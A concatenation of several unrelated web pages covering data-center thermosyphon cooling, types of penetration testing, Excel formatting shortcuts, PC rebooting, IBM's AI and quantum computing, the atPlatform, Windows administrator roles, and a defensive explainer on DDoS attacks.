With a split system approach to cooling units, Dunnavant explains, you only have to deal with the heat absorption component of the cooling process from inside the building. The heat is transported by water or refrigerant piping to external heat rejection equipment, installed on the roof or around the building perimeter, where ultimately the heat is rejected into the ambient air.
“Having the heat absorption process decoupled from the heat rejection process is the most space-efficient and practical approach to accommodate rising heat densities. Compared to packaged air-handling units, large ductwork is replaced by relatively small interconnected piping.
“In the case of air cooling, it's practically impossible to move all the hot air to package units, and deliver the cooled air back down to the data halls, once you get above a two-story data center,” says Dunnavant.
In the Munters SyCool system, there is a separate indoor evaporator (heat absorber) and an outdoor condenser (heat rejector). A low GWP (Global Warming Potential) refrigerant – a type of working fluid used to transfer energy – flows into the evaporator in a liquid state.
As the hot air or liquid from the data center flows through the heat exchangers within the SyCool air-handler (CRAH) or LCEs (Liquid Cooling Evaporators), the liquid refrigerant changes phase to a vapor. This vapor flows up through pipes (risers), transporting the heat up to the condensers where the heat is rejected into the atmosphere, converting the vapor refrigerant back to a liquid, and allowing gravity to transport the liquid through “downcomer” pipes back to the evaporators to begin the cycle over again.
This process of moving heat naturally, by phase change and gravity, is called a thermosyphon. Thermosyphons are an energy-efficient approach to heat exchange, since they require no pumps and offer other benefits compared to more conventional chilled water approaches.
“Thermosyphon technology is not new, it's been around for quite a long time. However, Munters is the first to apply the technology to data center heat rejection at large scale,” Dunnavant explains.
“Normally in the classic example, where the condensers are on the roof, the refrigerant flows up to V-shaped banks of coils that ambient air is drawn over using axial, variable speed fans, to condense thermosyphon vapor refrigerant to a liquid.”
There are two methods for condensing vapor refrigerant back to a liquid with SyCool: a) when the ambient air is cool, thermosyphon condenser coils perform the work (passive condensing) and b) as the ambient air dry-bulb temperature exceeds the economizing threshold, brazed plate heat exchangers (active condensers) perform the work.
The active condensers have conventional DX refrigeration on one side of the brazed plate heat exchangers, to absorb the heat from the thermosyphon refrigerant, which flows through the opposite side of the heat exchanger, where the vapor is condensed back to a liquid. The active condenser begins assisting with the condensing process as needed, as the outdoor air temperature rises.
Advantages of this approach are: a) there are no pumps required to circulate what's called the working fluid, the refrigerant, as this process takes advantage of the physics of phase change and gravity, b) the working fluid is not at risk of freezing (a concern for water-based systems in cold climates), c) the approach is modular – installed in 125kW, 250kW, 400kW, 500kW, or 800kW (future) blocks – and scalable to accommodate future demand. D) the economizer is superior to most other strategies, allowing compressors to remain off for many annual hours, keeping energy costs low. Additionally, as there are no pumps, there are fewer potential points of failure, enhancing reliability.
“Chilled water plants are now commonly used to cool large data centers, especially colos, and chillers using magnetic bearing compressors operating at high suction temperatures are quite efficient. However, the economizers (when included) paired with these chillers are often inefficient, forcing compressors to run until outdoor temperatures drop below about 40F, or continuously when there is no economizer. Additionally, the chilled water plant’s extensive piping, valves, pumping systems, and controls are both complex and expensive.”
A real pending issue, says Dunnavant, “is that as we move towards data centers utilizing both air and liquid cooling, the chilled water temperature must usually be selected to meet the needs of the air cooling, and is often suboptimal for liquid cooling. This is acceptable if liquid cooling is a small portion of the total, however, as the fraction of liquid cooling increases, the lost energy savings that could result from operating using warmer water temperatures begin to add up.”
With SyCool, each matched evaporator and condenser pair uses factory controls that operate optimally for each environment, either air or liquid cooling.
Cooling in a hotter world
Many modern data centers are required to operate under increasingly hot conditions. 2023 was the hottest year on record worldwide, and many data centers in key metropolitan areas such as London suffered outages, in part, because of their inability to cool effectively under the strain of record heat wave temperatures.
According to Dunnavant, another advantage of SyCool’s design is an abundance of heat transfer surface area in the external hardware.
“This allows you to achieve an economizer that can provide 100 percent of the cooling at really elevated ambient air temperatures. If you're trying to cool air at 95 Fahrenheit to 75 Fahrenheit, you can typically do that when the outdoor air temperature is in the low 60s Fahrenheit or below.
“A typical waterside economizer, that's integral to a chiller, is not able to do that until it's around 40 degrees Fahrenheit or below. The SyCool cycle can reject the bulk of the annual cooling load without using compressor energy, which can save substantial electrical power on an annual basis.”
Reducing energy consumption is of growing concern for data center operators, both for economic and sustainability reasons, and now also to reduce the strain on an aging electrical grid. In 2023, we’ve seen countries such as Germany and the UK push out regulations demanding energy efficiency standards from data center operators.
Ultimately, as the challenges of data center cooling continue to shift, the industry can certainly benefit from looking towards new methods of attacking these issues. Not only in terms of cost savings and efficiency, but the effective rejection – and potential reuse – of heat from these facilities in order to create a more sustainable industry.
To find out more about Munter’s SyCool system please visit munters.com.
More from Munters
Munters targets expansion in Europe after closing EMEA data center equipment factory in 2019
Relocates staff 40 miles to Botetourt County to meet increased demand | <urn:uuid:865426c7-3834-4cc9-9edc-38fe9ddb70d2> | CC-MAIN-2024-38 | https://www.datacenterdynamics.com/en/marketwatch/a-problem-shared-how-split-system-cooling-can-help-todays-high-density-data-centers/ | 2024-09-11T16:47:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651390.33/warc/CC-MAIN-20240911152031-20240911182031-00256.warc.gz | en | 0.935062 | 1,850 | 2.515625 | 3 |
Have you ever wondered how companies secure their digital fortress from cyber threats?
Cyber-attacks are becoming more sophisticated every day. Understanding and using the different types of penetration testing is crucial.
In this blog, we’ll dive into the types of penetration testing. We’ll discuss its importance and cover methods to safeguard businesses.
What is Penetration Testing?
Penetration testing, or ethical hacking, simulates cyber attacks to find system vulnerabilities.
The goal is to test your digital defences for weaknesses. This helps identify vulnerabilities before hackers attack.
Ethical Hacking and Security Testing Methodologies
Ethical hacking is at the heart of penetration testing, where testers adopt a hacker’s mindset to uncover vulnerabilities.
Ethical hackers use security testing methodologies to identify and reduce risks for robust security.
Vulnerability Assessment vs Penetration Testing
While often mentioned together, vulnerability assessments and penetration testing serve different purposes.
A vulnerability assessment is the process of finding, ranking, and categorizing vulnerabilities within a system to address them. Vulnerability assessments are a very weak form of security auditing because they rely on automated tools, which are notorious for their false positives (fake findings, which waste your time and money) and false negatives (missed vulnerabilities).
Penetration testing exploits vulnerabilities to test security measures. It assesses real-world security effectiveness and is a process performed at least in part by experienced professionals, which ensures less missed vulnerabilities and zero false positives (fake findings) in a report.
Why Penetration Testing is Essential
The importance of penetration testing cannot be overstated. It helps identify vulnerabilities and formulates a strategic response to mitigate threats.
Understanding various penetration testing types is the first step to secure your digital assets.
The goal is to identify vulnerabilities before they can be exploited. You can test web applications, networks, or other methods.
Types of Penetration Testing
- Web Application Penetration Testing. This type of testing scrutinizes the security of web applications. It uncovers issues like SQL injection, cross-site scripting, and flaws in security settings. A thorough web app penetration test can safeguard your apps from outside threats.
- Mobile or Desktop App Penetration Test. Securing mobile and desktop applications is paramount with the increasing use of mobile and desktop applications. This testing identifies vulnerabilities in applications running on various devices.
- Cloud Audit or Cloud Penetration Test. In today’s day and age, where everything tends to deployed to AWS, Azure, Google Cloud Platform (GCP), Kubernetes or Docker, whether with or without Infrastructure as Code such as Terraform, it is of paramount importance to audit the security of the cloud configuration to ensure there are no unintended security vulnerabilities that allow some docker read-only user to escalate privileges to AWS admin, for example.
- Network Penetration Testing. Network penetration testing aims to discover security weaknesses within your network setup. It assesses firewalls, routers, switches, and the security policies that govern network access. This testing ensures that the internal network is secure against attacks. This may be performed from an internal perspective (aka “Assumed breached”) or an external perspective (discovering and targeting what is reachable from the internet).
- Social Engineering Tests. Social engineering tests check the human element of security. Testers use phishing, baiting, or pretexting to manipulate individuals to try and compromise security protocols. It highlights the need for robust security awareness training among employees. This may be part of an external penetration test and may also be called “red teaming”.
- Wireless Security Assessment. This assesses the security of wireless networks. Testers search for vulnerabilities to prevent unauthorized access to wireless networks. They aim to stop attacks such as eavesdropping and data theft.
- Internal and External Penetration Tests. Tests assess security posture from within or outside the organization. Internal tests mimic inside attacks. External tests simulate attacks by external threat actors.
7ASecurity offers top-notch penetration testing services to protect businesses from cyber threats.
By understanding the diverse array of penetration testing types, companies can take a proactive approach to resolving cyber threats.
Ready to fortify your digital defences?
Visit 7ASecurity to learn about their services and how they can secure your operations from cyber threats. | <urn:uuid:a098ea10-4132-4c35-85a0-4d4152e3ba94> | CC-MAIN-2024-38 | https://7asecurity.com/blog/2024/04/types-of-penetration-testing/ | 2024-09-12T23:11:30Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00156.warc.gz | en | 0.914051 | 884 | 3.1875 | 3 |
Microsoft Excel has many moving parts…assuming you know how to move them, of course. For this week’s tip, we’re going over a few shortcuts to help you make the best use of some of these parts.
Perhaps the most basic Excel formatting of all, it can help to distinguish between your data to have different values aligned to the cell in different ways. Of course, there are keyboard shortcuts for each.
- To center the value within the cell, press Alt+H+A+C.
- To align the value within the cell to the left, press Alt+H+A+L.
- To align the value within the cell to the right, press Alt+H+A+R.
Oftentimes, the contents of your spreadsheet will require certain formatting in order to properly communicate their significance. You can assign this formatting for different data types with the following shortcuts:
- To return your value to general formatting, press Ctrl+Shift+~.
- To indicate that a value refers to currency, press Ctrl+Shift+$.
- To format a value as a percentage, press Ctrl+Shift+%.
- To properly format a date, press Ctrl+Shift+#.
- To format a value in scientific terms, press Ctrl+Shift+^.
- To ensure that a number is properly formatted, press Ctrl+Shift+!.
- To properly format time, press Ctrl+Shift+@.
Borders can come in handy on a spreadsheet, as they give the differences between values more pronunciation. Use the following shortcuts to apply borders to a selected cell:
- To cut to the chase and apply a border to all of a cell’s edges, press Ctrl+Shift+A.
- To only add a borderline to the right edge of a cell, press Alt+R.
- To add a border to the left edge of a cell, press Alt+L.
- To put a border on the top edge of a cell, press Alt+T.
- To apply a border to the bottom edge of a cell, press Alt+B.
- To easily remove the borders from a cell, press Ctrl+Shift+_.
Okay, maybe this is the most basic Excel formatting, as these formatting needs can appear in essentially every Microsoft document you create, including your spreadsheets. These shortcuts should seem very familiar:
- To have your data appear in a bold font, press Ctrl+B.
- To type in italics, press Ctrl+I.
- To underline the contents of a cell, press Ctrl+U.
- To strikethrough the contents of a cell, press Ctrl+S.
We hope that this list comes in handy. We suggest printing it out so it can be easily accessible when needed. Are there any other program shortcuts that you’d like to know? Leave a few suggestions in the comments! | <urn:uuid:e5ec0e77-d4cf-4a0e-adb7-93a81561fc80> | CC-MAIN-2024-38 | https://ctnsolutions.com/tip-of-the-week-formatting-shortcuts-for-excel/ | 2024-09-14T04:12:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00056.warc.gz | en | 0.818155 | 604 | 3.484375 | 3 |
When you call tech support, you’re probably going to get the same response every single time: “Have you tried turning it off and on again?” There’s a reason that this happens so often, and it’s because restarting your computer is a great, low-tech way to resolve some basic issues with your system. However, it’s still good to be cautious about more serious issues that a reboot won’t fix. We’ll walk you through what a reboot does, and it can be effective at fixing minor issues with your PC.
What Happens When You Reboot
When you restart your PC, it can resolve a surprising number of problems. According to HowToGeek, most problems that lead to the failure of a Windows operating system are caused by bad code (code that’s not being processed for whatever reason). This can be caused by something as simple as a failing driver or a hardware failure. Either way, something went wrong, and if this code isn’t processed properly, it can lead to what’s known as the “blue screen of death.”
Sometimes you might even notice that your computer is just acting sluggish or unstable, rather than experiencing a complete and total system block like a blue screen or error. Restarting your PC can often fix these problems.
Restarting your PC provides the operating system an opportunity to process the code properly and proceed as intended. Hopefully the problem works itself out, and you’ll be able to use the PC without further incident. In general, you can restart your computer whenever you’re experiencing poor computer performance. This gives your PC the chance to start fresh, and hopefully move forward with minimal complications.
Common Issues Solved By a System Restart
If you think that rebooting your computer will fix a problem, you should know that it’s one of the most immediate and simple ways to do so. These are some of the most common issues resolved by a system reboot:
- Is Windows moving slowly? If your Windows operating system is running slowly, you might have a program that’s using up all of your computer’s resources. While it’s possible to just open up your task manager and find the program that’s causing the trouble, you can reboot the operating system without needing to experiment.
- Do your programs eat up memory? Many programs, like Mozilla FireFox, are notorious for causing memory leaks. These can slow down your computer and make it difficult to accomplish any work. Restarting your computer gives you a chance to start fresh.
- Are you having Internet or network problems? This doesn’t just apply to your PC. This advice can apply to any computing hardware that you use on a daily basis, like Internet routers, modems, etc. If it’s not working the way it should, try restarting it. Unplug it and plug it back in. This is what’s known as a hard reset, and can be an easy fix to a difficult problem. Keep in mind that it won’t fix major problems, but it should be a solid go-to strategy for troubleshooting minor technical difficulties.
If you’ve ever tried calling your computer manufacturer’s tech support, you’ve probably been asked several times if you’ve turned your computer off, and then back on again. Despite how repetitive this advice can be, it’s a pretty easy way to fix some technical problems.
Bonus: Check out this funny clip from The IT Crowd, showcasing just how repetitive this response can seem.
If you’re still having issues with your technology, be sure to contact the professional IT technicians at CTN Solutions. | <urn:uuid:ab5aa668-e94a-48bd-b10c-9ac5ababb30c> | CC-MAIN-2024-38 | https://ctnsolutions.com/why-does-rebooting-your-pc-take-care-of-so-many-issues/ | 2024-09-14T04:01:14Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00056.warc.gz | en | 0.936177 | 781 | 2.75 | 3 |
Dario Gil, senior vice president and director of IBM Research, gave a talk this week at the online CES 2021 conference where he discussed the acceleration of resolving challenges through quantum computers, AI, and hybrid cloud.
He said the urgency of science has never been greater considering the pandemic but also for other global issues to come, which could include food shortages, climate change, and energy security. “What we really need to do is accelerate the rate of discovery to solve some of the world’s most pressing problems,” Gil said.
Technologies such as hybrid cloud, quantum computing, and AI could change that process and supercharge traditional scientific methods, he said. The process of classic trial and error, experimentation and testing can be slow, Gil said, though the advent of computers advanced the scientific paths to discovery.
IBM has been on a bit of campaign of late to display its grounding in the further development of AI and the promises of quantum computing. Its compute resources have already been part of the vaccine research landscape and has been weaving AI into cloud migration. In addition to furthering those conversations,s Gil’s talk via CES also showed how the conference, known historically for its consumer electronics announcements, continues to increase its attention on technology implemented by enterprises and industry.
The growing power of AI enables new levels of speed, automation, and scale, Gil said. This can also help solve complex problems. He offered an example of the hypothetical creation of a new, recyclable plastic. “We can use AI to sift through the existing knowledge on polymer manufacturing to see all the previous research, patents, and fabrication attempts and form a knowledge base,” he said.
From there, quantum computers would conduct simulations to augment that knowledge base, Gil said. AI models could identify gaps in knowledge and propose candidate molecules to create the new plastic. Knowledge gained through such a process could lead to new questions to be answered, he said. “This would be a continual loop of discovery, increasingly automated and increasingly autonomous.”
Hybrid cloud ties such resources as quantum and supercomputers together, creating a medium for them to function together, Gil said. A single IBM Z systems mainframe could process one trillion web transactions in one day, he said. IBM also developed supercomputers for national laboratories, such as IBM Summit at the Oak Ridge National Laboratory, which was put to work on COVID-19 research.
“It is capable of processing 200,000 trillion calculations per second,” Gil said. Even with such resources, he said there are problems supercomputers cannot solve because the problems and ways to respond to them can grow exponentially.
“Quantum computers will change this,” Gil said. “They offer a powerful alternative because they combine physics with information to compute in a fundamentally different way.” The principles of quantum mechanics and quantum algorithms in this class of computing can lead to faster, more accurate answers than prior technology. “They should be able to simulate new molecules that classical computers never could,” Gil said.
Hybrid cloud is a way to deploy these innovations, he said, and make them available across the globe. Using the cloud to unify technologies could provide near-limitless pools of computing, Gil said. All the elements contribute to what he called accelerated discovery. “This new method should give us the discovery-driven enterprise,” Gil said.
With accelerated discovery, he said the typical 10-year timeframe to discover new materials and then bring them to market at a production cost of $10 million to $100 million could be shortened potentially to one year and $1 million. “We want to cut the cost down by 90%,” Gil said. The hope is to introduce more efficient and sustainable ways of creating new materials. “It’s really about complementing and scaling human expertise,” he said.
Technology on this front, such as the IBM RXN for Chemistry cloud-based AI tool, has already been put to work in the development of autonomous labs, Gil said, to automate chemical synthesis, predict chemical reactions, and decrease production time while increasing reliability. “This shows how hybrid cloud is becoming a key technological factor to revolutionize several fields,” he said. “Anywhere you have an internet connection, you have a chemical lab in your hands.”
For more content on AI, quantum computing, and cloud, follow up with these stories:
About the Author
You May Also Like
Radical Automation of ITSM
September 19, 2024Unleash the power of the browser to secure any device in minutes
September 24, 2024Maximizing Manufacturing Efficiency with Real-Time Production Monitoring
September 25, 2024 | <urn:uuid:c5f33fd0-29f6-4cc8-bdfb-b16f9608f235> | CC-MAIN-2024-38 | https://www.informationweek.com/it-infrastructure/ibm-speaks-on-growing-hybrid-cloud-ai-quantum-computing | 2024-09-14T04:23:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00056.warc.gz | en | 0.95828 | 976 | 2.671875 | 3 |
The atPlatform allows people, entities and things to communicate privately and securely without having to know about the intricacies of the underlying IP network. The atProtocol is the application protocol used to communicate and atSigns are the addresses on the protocol. All cryptographic keys are cut at the edge by the atSign owner, meaning only the receiving and sending atSigns see data in the clear.
The atPlatform can be used to send data synchronously or asynchronously and can be used as a data plane or a control plane or both simultaneously at Internet scale.
An atServer is both a personal data service for storing encrypted data owned by an atSign, and a rendezvous point for information exchange. An atServer is responsible for the delivery of encrypted information to other atServers, from which the owners of those atSigns can then retrieve the data.
Unless explicitly made public, atServers only store encrypted data and do not have access to the cryptographic keys, nor the ability to decrypt the stored information.
In order for an atSign to communicate with another one on the internet, we need to locate the atServer that can send and receive information securely on its behalf.
The location of an atServer is found using the atDirectory service (root.atsign.org:64
). This directory returns the DNS address and port number of the atServer for any atSign that it has a record for. The atDirectory service contains no information about the owner of the atSign.
The atProtocol communicates via layer 7, the application layer of the OSI model, over TCP/IP.
atSDKs provide developers with atPlatform specific building tools in a number of languages and for a number of operating systems and hardware. The atSDK allows developers to rapidly develop applications that use the atPlatform. | <urn:uuid:7121d645-96c7-4869-b401-51a7087d8701> | CC-MAIN-2024-38 | https://docs.atsign.com/core | 2024-09-17T19:48:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00656.warc.gz | en | 0.8854 | 373 | 2.59375 | 3 |
In the world of computing and networking, Administrators play a pivotal role. They serve as the linchpins responsible for ensuring that systems are secure, efficient, and functional. While the core responsibilities remain largely consistent across different operating systems and network architectures, the tools, processes, and capabilities can differ significantly. This article aims to shed light on the multifaceted role of Administrators, with a special focus on Windows Systems, to offer a nuanced understanding of what it takes to manage complex computing environments.
In this article:
- What is an Administrator?
- Types of Administrators
- Common Tools Used by Administrators
- Administrator in Windows Systems
- Best Practices for Administrators
- Administrator vs. Superuser
- Becoming an Administrator
1. What is an Administrator?
An Administrator in the context of computing and networking is an individual—or a system role—empowered with permissions to configure, manage, and oversee a computer system, network, or application. The Administrator role serves as the highest level of access, granting the ability to alter system settings, manage user accounts, and implement security protocols among other functions.
Administrators are tasked with a myriad of responsibilities aimed at maintaining the seamless operation of computing environments. Here are some of the key responsibilities:
- System Configuration: Installing, configuring, and maintaining software and hardware components.
- User Management: Creating, managing, and removing user accounts and roles, along with the assignment and adjustment of permissions.
- Security Oversight: Implementing and enforcing security measures such as firewalls, antivirus software, and data encryption.
- Resource Allocation: Managing system resources like CPU, memory, and disk space to ensure optimal performance.
- Backup and Recovery: Ensuring data is regularly backed up and readily restorable in the event of system failure or data loss.
- Monitoring and Auditing: Keeping an eye on system performance and user activities, often utilizing specialized monitoring tools.
- Update and Patch Management: Installing timely updates and patches to keep the system secure and up-to-date.
- Troubleshooting: Identifying and resolving system and network issues, often under time-sensitive conditions.
- Documentation: Keeping detailed records of system configurations, policies, and procedures for future reference and compliance audits.
You can rename the default Administrator account, but you cannot delete it. If you rename the account, make sure you remember what the new name is!
2. Types of Administrators
System Administrators, often abbreviated as SysAdmins, are responsible for overseeing individual systems or an entire system network. They handle tasks like server maintenance, operating system updates, and user management. Given their broad mandate, SysAdmins often work closely with other types of administrators to ensure holistic system health.
Network Administrators are specifically focused on network infrastructure, including hardware like switches, routers, and firewalls, as well as network protocols and configurations. Their primary goals are to ensure network availability, optimize data transfer rates, and implement security measures such as firewalls and intrusion detection systems.
Database Administrators (DBAs) specialize in managing databases. Their responsibilities include database design, implementation, maintenance, and security. They are well-versed in database languages like SQL and are responsible for activities like data backup and recovery, performance tuning, and data migration.
3. Common Tools Used by Administrators
System Monitoring Tools
System monitoring is crucial for any administrator looking to ensure optimal performance and stability. Key tools in this category include:
- Nagios: A comprehensive monitoring solution that tracks system performance, network protocols, and applications. See more
- SolarWinds Server & Application Monitor: Offers real-time monitoring and customized reporting.
- Zabbix: An open-source tool that provides network and application monitoring.
- Windows Performance Monitor: A native Windows tool that provides real-time monitoring for various system resources.
Network Management Tools
Effective network management is pivotal for maintaining a robust and secure IT infrastructure. Notable tools in this segment are:
- Wireshark: A network protocol analyzer that lets administrators capture and interactively browse the traffic running on a computer network.
- NetFlow Analyzer: Provides in-depth visibility into network traffic patterns and bandwidth utilization. See more
- Cisco’s Network Assistant: A network management tool specifically designed for Cisco network solutions, offering a graphical view of network data.
- PuTTY: A terminal emulation program used for remotely accessing network devices.
The security of a network is non-negotiable. Administrators deploy various tools to protect the network from internal and external threats. These tools include:
- Firewall Software: Tools like pfSense or Windows Firewall help in packet filtering and network traffic management.
- Antivirus Programs: Solutions like Windows Defender and McAfee offer real-time protection against malware and other threats.
- Intrusion Detection Systems (IDS): Tools such as Snort help in monitoring inbound and outbound network traffic for suspicious activities.
- Virtual Private Networks (VPN): Software like OpenVPN ensures secure and encrypted communication over a public network. See more
4. Administrator in Windows Systems
What Sets Them Apart?
Administrators in Windows Systems are distinguished by their intricate involvement with the Windows ecosystem. This specialized environment allows for a distinct set of tools, features, and protocols. Moreover, Windows Administrators often have to deal with a blend of desktop and server operating systems—ranging from Windows 10 to Windows Server editions—that require specific skill sets and expertise.
Windows-specific Tools and Features
Windows Administrators have a rich array of dedicated tools at their disposal. Some of these are:
- Windows Server Manager: A management console that allows administrators to configure and manage both local and remote Windows-based servers.
- PowerShell: A task automation framework that provides a command-line shell and a scripting language, specialized for system administration tasks.
- Active Directory: A directory service that enables centralized management of network resources, including users and devices. See more
- Group Policy: A feature that allows admins to implement specific configurations for users and computers within an Active Directory environment. See more
- Windows Defender: The built-in antivirus and threat detection tool that can be centrally managed by administrators.
- Task Scheduler: Allows for the automation of scripts and software at pre-defined times or after specified time intervals.
User Account Control (UAC) and Permissions
User Account Control (UAC) is a security component in Windows. It limits application software to standard user privileges until an administrator authorizes an elevation of privilege. This is essential for:
- Preventing Unauthorized Access: UAC notifications are triggered when potentially harmful actions are initiated, requiring administrative consent.
- Principle of Least Privilege: UAC enables administrators to allocate minimal necessary access, or permissions, to software and files, thereby enhancing security.
5. Best Practices for Administrators
- Regular Patch Management: Ensure that all systems are regularly updated with the latest security patches.
- Use Role-based Access Control: Assign permissions based on roles within the organization rather than to individual users.
- Enable Logging and Monitoring: Utilize Windows Event Logs to track user activity and system changes.
- Secure Administrative Accounts: Use strong, unique passwords and multi-factor authentication for all administrative accounts.
- Regular Audits: Periodic system and security audits are essential to identify potential vulnerabilities.
- Backup and Disaster Recovery: Maintain regular backups and establish a robust disaster recovery plan.
- System Hardening: Minimize system vulnerabilities by turning off unnecessary services and closing unused network ports.
- Use Firewall Rules: Implement and maintain a well-defined set of firewall rules to control inbound and outbound network traffic.
6. Administrator vs. Superuser
While the terms “Administrator” and “Superuser” are often used interchangeably, they have nuanced differences and similarities, especially when comparing Windows Systems with UNIX-based systems like Linux.
- Operating System Specificity: The term “Administrator” is commonly used in the context of Windows, whereas “Superuser,” often denoted as ‘root’ in UNIX-based systems, is prevalent in Linux and macOS.
- Level of Control: Both Administrator and Superuser have the highest level of system control, but Superuser in UNIX-based systems often has unfettered access to the entire system without the restrictions that UAC might impose in Windows.
- Account Type: In Windows, the Administrator account is often a separate account that can be assigned to one or more users. In UNIX-based systems, the Superuser is generally a single account named ‘root.’
- Security Implications: Because of its unrestricted access, the Superuser account can pose a greater security risk if compromised, as compared to an Administrator account with UAC enabled.
- Common Responsibilities: Both are responsible for system setup, maintenance, and security, although the specific tasks may differ based on the operating system.
7. Becoming an Administrator
- Networking Fundamentals: A strong grasp of networking principles is vital.
- Operating System Proficiency: Familiarity with the ins and outs of the relevant operating systems, whether it’s Windows, Linux, or macOS.
- Scripting and Automation: Skills in scripting languages like PowerShell or Bash for task automation.
- Security Best Practices: Understanding of firewalls, encryption, and intrusion detection systems.
- Problem-solving: Strong analytical skills to troubleshoot issues efficiently.
For those looking to formalize their skills, several certification paths are available:
- Microsoft Certified: Azure Administrator Associate: For those focusing on Windows environments, particularly Azure.
- CompTIA A+ and Network+: Good starting points that cover essential IT skills.
- CCNA (Cisco Certified Network Associate): For those looking to specialize in network administration.
- RHCE (Red Hat Certified Engineer): Useful for UNIX-based system administrators.
- Certified Information Systems Security Professional (CISSP): For those looking to focus on security.
The role of a Network Administrator is crucial in any computing environment. This article has delved into the specifics of what sets an Administrator apart in the Windows ecosystem and highlighted the key best practices that apply universally across different platforms. Whether you are an Administrator or aspire to become one, understanding the different facets of this role can empower you to manage and secure complex computing environments effectively. | <urn:uuid:f1c3c50f-c368-4557-9f8f-932448381211> | CC-MAIN-2024-38 | https://networkencyclopedia.com/administrator/ | 2024-09-19T00:45:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651944.55/warc/CC-MAIN-20240918233405-20240919023405-00556.warc.gz | en | 0.886435 | 2,171 | 3.453125 | 3 |
What is a DDoS attack?
A distributed denial-of-service attack (DDoS attack) sees an attacker flooding the network or servers of the victim with a wave of internet traffic so big that their infrastructure is overwhelmed by the number of requests for access, slowing down services or taking them fully offline and preventing legitimate users from accessing the service at all.
While a DDoS attack is one of the least sophisticated categories of cyberattack, it also has the potential to be one of the most disruptive and most powerful by taking websites and digital services offline for significant periods of time that can range from seconds to even weeks at a time.
How does a DDoS attack work?
DDoS attacks are carried out using a network of internet-connected machines; PCs, laptops, servers, Internet of Things devices, all controlled by the attacker. These could be anywhere and it’s unlikely the owners of the devices realize what they are being used for as they are likely to have been hijacked by hackers.
Common ways in which cyber criminals take control of machines include malware attacks and gaining access by using the default username and password the product is issued with, if the device has a password at all.
Once the attackers have breached the device, it becomes part of a botnet, a group of machines under their control. Botnets can be used for all manner of malicious activities, including distributing phishing emails, malware, or ransomware, or in the case of a DDoS attack, as the source of a flood of internet traffic.
The size of a botnet can range from a small number of zombie devices to millions of them. Either way the botnet’s controllers can turn the web traffic generated towards a target and conduct a DDoS attack.
Servers, networks, and online services are designed to cope with a certain amount of internet traffic but, if they’re flooded with additional traffic in a DDoS attack, they become overwhelmed. The high amounts of traffic being sent by the DDoS attack clogs up or takes down the systems’ capabilities, while also preventing legitimate users from accessing services (which is the ‘denial of service’ element).
A DDoS attack is launched with the intention of taking services offline in this way, although it’s also possible for online services to be overwhelmed by regular traffic by non-malicious users. For example, if hundreds of thousands of people are trying to access a website to buy concert tickets as soon as they go on sale. However, this is usually only short, temporary, and accidental, while DDoS attacks can be sustained for extended periods of time.
What is an IP stresser and how does it relate to DDoS attacks?
An IP stresser is a service that can be used by organisations to test the robustness of their networks and servers. The goal of this test is to find out if the existing bandwidth and network capacity are enough to handle additional traffic. An IT department using a stresser to test their own network is a perfectly legitimate application of an IP stresser.
However, using an IP stresser against a network that you don’t operate is illegal in many parts of the world because the end result could be a DDoS attack. However, there are cyber-criminal groups and individuals that will actively use an IP stresser as part of a DDoS attack.
How do I know if I’m under DDoS attack?
Any business or organisation that has a web-facing element needs to think about the regular web traffic it receives and provision for it accordingly; large amounts of legitimate traffic can overwhelm servers, leading to slow or no service, something that could potentially drive customers and consumers away. Organisations also need to be able to differentiate between legitimate web traffic and DDoS attack traffic.
Capacity planning is, therefore, a key element of running a website, with thought put into determining what’s an expected, regular amount of traffic and what unusually high or unanticipated volumes of legitimate traffic could look like, so as to avoid causing disruption to users either by taking out the site due to high demands, or mistakenly blocking access due to a DDoS false alarm.
So how can organisations differentiate between a legitimate increase in demand and a DDoS attack?
In general, an outage caused my legitimate traffic will only last for a very short period of time and often there might be an obvious reason for the outage, such as an online retailer experiencing high demand for a new item, or a new video game’s online servers getting very high traffic from gamers eager to play.
In the case of a DDoS attack, there are some tell-tale signs that it’s a malicious and targeted campaign. Often DDoS attacks are designed to cause disruption over a sustained period of time, which could mean sudden spikes in malicious traffic at intervals causing regular outages.
The other key sign that your organisation has likely been hit with a DDoS attack is that services suddenly slow down or go offline for days at a time, which would indicate the services are being targeted by attackers who just want to cause as much disruption as possible. Some of these attackers might be doing it just to cause chaos; some may be paid to attack a particular site or service. Others might be trying to run some kind of extortion racket, promising to drop the attack in exchange for a pay-off.
Using our Ethical Hacking Services will allow you us to penetrate your computer system or network for the purpose of access, finding security vulnerabilities, verifying user activity levels and documentation of said activities. As a result, this allows bva to true-up security holes, make systems more reliable, and secure commercial and personal data. So, you can stay protected against not just DDoS attacks but all other cyber threats as well.
What do I do if I’m under DDoS attack?
Once it’s become clear that you’re being targeted by DDoS attack, you should piece together a timeline of when the problems started and how long they’ve been going on for, as well as identifying which assets like applications, services and servers are impacted, how that’s negatively impacting users, customers and the business as a whole.
It’s also important that organisations notify their web-hosting provider, it’s likely that they will have also seen the DDoS attack, but contacting them directly may help curtail the impacts of a DDoS campaign, especially if it’s possible for the provider to switch your IP address. Switching the IP to a new address will mean that the DDoS attack won’t have the impact it did because the attack will be pointing in the wrong direction.
If your security provider provides a DDoS mitigation service, it should help reduce the impact of the attack, but especially large attacks can still cause disruption despite the presence of preventative measures. The unfortunate thing about DDoS attacks is that while they’re very simple to conduct, they’re also very effective, so it’s still possible that even with measures in place that services could be taken offline for some time.
It’s also important to notify users of the service about what is happening, because otherwise they could be left confused and frustrated by a lack of information. Businesses should consider putting up a temporary site explaining that there are problems and provide users with information they should follow if they need the service. Social-media platforms can also be used to promote this message.
How do I protect against DDoS attacks?
What makes DDoS attacks effective is the ability to direct a large amount of traffic at a particular target. If all of an organisations’ online resources are in one location, the attackers only need to go after one particular target to cause disruption with large amounts of traffic. If possible, it’s useful to spread systems out, so it’s more difficult, although not impossible for attackers to direct resources towards everything at once.
